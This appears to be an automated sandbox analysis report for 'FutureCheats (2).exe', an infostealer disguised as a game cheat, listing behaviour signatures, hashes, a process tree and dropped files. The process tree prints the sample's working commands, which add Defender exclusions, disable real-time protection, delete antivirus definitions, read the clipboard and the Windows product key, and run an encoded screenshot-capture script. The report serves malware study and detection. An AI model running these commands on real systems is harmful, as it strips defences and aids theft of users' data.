Analysis

  • max time kernel
    17s
  • max time network
    17s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    29-11-2024 16:59

General

  • Target

    FutureCheats (2).exe

  • Size

    7.6MB

  • MD5

    a8bf9f20765916baf9f080d89c1f0a93

  • SHA1

    565d4e72dcc9bcf33f7434f63873e57585662fcd

  • SHA256

    582029816195fc7f7c92d596afed71e63565fa5e509c62182486be8ff8fac694

  • SHA512

    19bf6c396ca8706dfb5ecdd8a3e239f28bbfebde4ce3241914295fe8c4cd82080c7805c5fe53f415737d15ea738be86cb619afb9beca8ee2a7a871a6a49818c8

  • SSDEEP

    196608:kcHYfwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/j9:bIHziK1piXLGVE4Ue0VJ5

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FutureCheats (2).exe
    "C:\Users\Admin\AppData\Local\Temp\FutureCheats (2).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3212
    • C:\Users\Admin\AppData\Local\Temp\FutureCheats (2).exe
      "C:\Users\Admin\AppData\Local\Temp\FutureCheats (2).exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4088
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FutureCheats (2).exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FutureCheats (2).exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3432
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:3472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‎​.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3684
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‎​.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4680
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3500
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1552
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3220
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2052
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1400
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4516
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4744
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:3416
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4740
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\shxawplp\shxawplp.cmdline"
              5⤵
                PID:3836
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9FB.tmp" "c:\Users\Admin\AppData\Local\Temp\shxawplp\CSC52F051DC57D044238AFC433D880C45C.TMP"
                  6⤵
                    PID:1172
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1020
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:2576
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:948
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2648
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3140
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3812
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3628
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1316
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:4756
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4516
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "getmac"
                          3⤵
                            PID:4388
                            • C:\Windows\system32\getmac.exe
                              getmac
                              4⤵
                                PID:4456
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\ZyHN3.zip" *"
                              3⤵
                                PID:3128
                                • C:\Users\Admin\AppData\Local\Temp\_MEI32122\rar.exe
                                  C:\Users\Admin\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\ZyHN3.zip" *
                                  4⤵
                                  • Executes dropped EXE
                                  PID:1856
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                3⤵
                                  PID:3308
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic os get Caption
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1420
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                  3⤵
                                    PID:4836
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic computersystem get totalphysicalmemory
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3148
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                    3⤵
                                      PID:1124
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic csproduct get uuid
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4476
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                      3⤵
                                        PID:4524
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3724
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                        3⤵
                                          PID:3888
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic path win32_VideoController get name
                                            4⤵
                                            • Detects videocard installed
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1068
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                          3⤵
                                            PID:2516
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4104

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        3KB

                                        MD5

                                        e8a95a33bdaa8522f9465fd024c3ec88

                                        SHA1

                                        45c15dbb8ab99be8e813aee1ed3e21ad334c8745

                                        SHA256

                                        06abbf9cccdf6557b1f616e0c9214c580f1d2be928104a0c8193c2217dd98c1b

                                        SHA512

                                        c429d8d5bfba8790a725e9d6eed656b93e69bfa8290ca388cf007aeb82462db39539ce5da4ab00c19e795344119ab14cef915c39503da80a69953e0e2ee2a002

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        6a807b1c91ac66f33f88a787d64904c1

                                        SHA1

                                        83c554c7de04a8115c9005709e5cd01fca82c5d3

                                        SHA256

                                        155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

                                        SHA512

                                        29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        00b8976ac5feade4b44ae6f492f4892c

                                        SHA1

                                        6fc5c2baee3b9ec88dfbd055147be64848a8e7e7

                                        SHA256

                                        0640e1058c896933c5ae34e8869006557ffc34fe86dfa8f8cfe3ef8c548a406d

                                        SHA512

                                        2fdbf41bb6297c46d9245c2fba914dedd3710cc2aa061773507bfda33cf8819f86b6bd86274064355938af262f1e1e3e0778e3200d3ee0da7b4ae42c6c0fd26b

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        83d94e8aa23c7ad2db6f972739506306

                                        SHA1

                                        bd6d73d0417971c0077f772352d2f538a6201024

                                        SHA256

                                        dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881

                                        SHA512

                                        4224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e

                                      • C:\Users\Admin\AppData\Local\Temp\RESA9FB.tmp

                                        Filesize

                                        1KB

                                        MD5

                                        ef63f75c42fc6d238f5c593d4648f790

                                        SHA1

                                        d8a57c092abab58e96717f3e2fca56593bb3e325

                                        SHA256

                                        8afa443f9c34df6a7d7f8ab8dd549c21a228be298595f51e49f47142ebd9e44b

                                        SHA512

                                        8c625e5b6656d7e8e1f8d4538ec8b5168941b717105c289816575898602be003be582a0cfb2827e9e05ae1030ddd6bd489b7826fdc108728b8f57e68f811425c

                                      • C:\Users\Admin\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll

                                        Filesize

                                        117KB

                                        MD5

                                        862f820c3251e4ca6fc0ac00e4092239

                                        SHA1

                                        ef96d84b253041b090c243594f90938e9a487a9a

                                        SHA256

                                        36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

                                        SHA512

